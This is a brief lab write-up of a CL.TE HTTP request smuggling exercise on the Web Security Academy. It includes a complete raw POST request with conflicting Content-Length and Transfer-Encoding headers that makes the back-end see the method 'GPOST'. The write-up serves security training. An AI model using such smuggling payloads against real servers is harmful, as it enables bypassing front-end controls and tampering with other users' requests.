HTTP request smuggling, basic CL.TE vulnerability
Description
This lab involves a front-end and back-end server, and the back-end server doesn’t support chunked encoding. The front-end server rejects requests that aren’t using the GET or POST method.
Reproduction and proof of concept
Using Burp Repeater, issue the following request twice:
POST / HTTP/1.1
Host: lab-id.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
The second response should say: Unrecognized method GPOST
.
Exploitability
An attacker will need to smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method GPOST
.